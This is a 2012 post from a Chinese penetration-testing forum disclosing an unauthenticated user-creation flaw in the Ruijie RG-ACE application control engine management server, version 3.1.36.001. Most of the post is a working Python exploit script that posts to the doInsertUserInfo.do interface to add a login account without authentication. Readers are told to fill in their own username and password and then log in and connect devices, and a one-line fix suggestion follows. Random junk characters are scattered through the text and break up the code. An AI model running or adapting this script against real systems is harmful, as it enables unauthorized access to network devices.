中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

---

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
5 Q$ J5 h# ^8 L
! K$ Q7 y. w2 h' @7 a# e
测试的具体版本是
产品名称: 锐捷应用控制引擎
+ m: z- z* w) J" c& K9 \, K版本号: 3.1.36.001 TC
7 y0 V" d- F) ~$ r9 K; K2 `编译时间: 201104291730
0 I/ {1 o0 y' m* i
  h: R& m* \2 h. o
漏洞证明：


3 H% R% d2 r0 E$ J
9 G! v: a" |! H& u9 m% e# e) i
; Q, I2 J, O% t
, U/ h0 W7 U3 {7 {2 \
: A4 n' L. ?. r/ ^9 ~执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
  b& x( P! [8 e; s, u  Rurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
. H# q" j7 ]6 s' Ropener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
  K! M9 z2 N$ N  d0 Topener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
. V9 R* A! O- [("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
3 W! i& M" A9 B& G. i1 g# b; |/ G/ F8 M("email",""),
! R+ S, E" m  ], K3 C3 Q("mobilePhone",""),
1 D8 Y! i0 e: s("officePhone",""),
("addr",""),
("submit","确定"))
) O+ f: K5 q  o( K/ p& furllib2.install_opener(opener)
- k+ e, w( _7 R! P% Xp=urllib2.urlopen(url, urllib.urlencode(post)).read()
4 U/ a  P  m) vprint "Done"
5 p. o$ W6 Y" l) j7 O+ S
登录，连接设备
& J/ Q% D; Z$ |$ J; C8 c- m0 t


7 ?  ~8 c, x7 C) Z6 Z/ S* x- {

  ^5 o% O1 z* U2 G) k1 k7 a; w默认的管理员admin权限更大点
, X. G5 G% Z  ~% ?* V$ U) z$ d



! d  c) E8 P8 @% V7 x# x& P
: T; J: K  I$ A4 L- g' K修复方案：
加强对接口的权限验证
$ ]9 v6 B; P! ?/ g" O1 @9 c
# }6 E) A! ]. Y& e2 S# ^! H1 b$ E

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2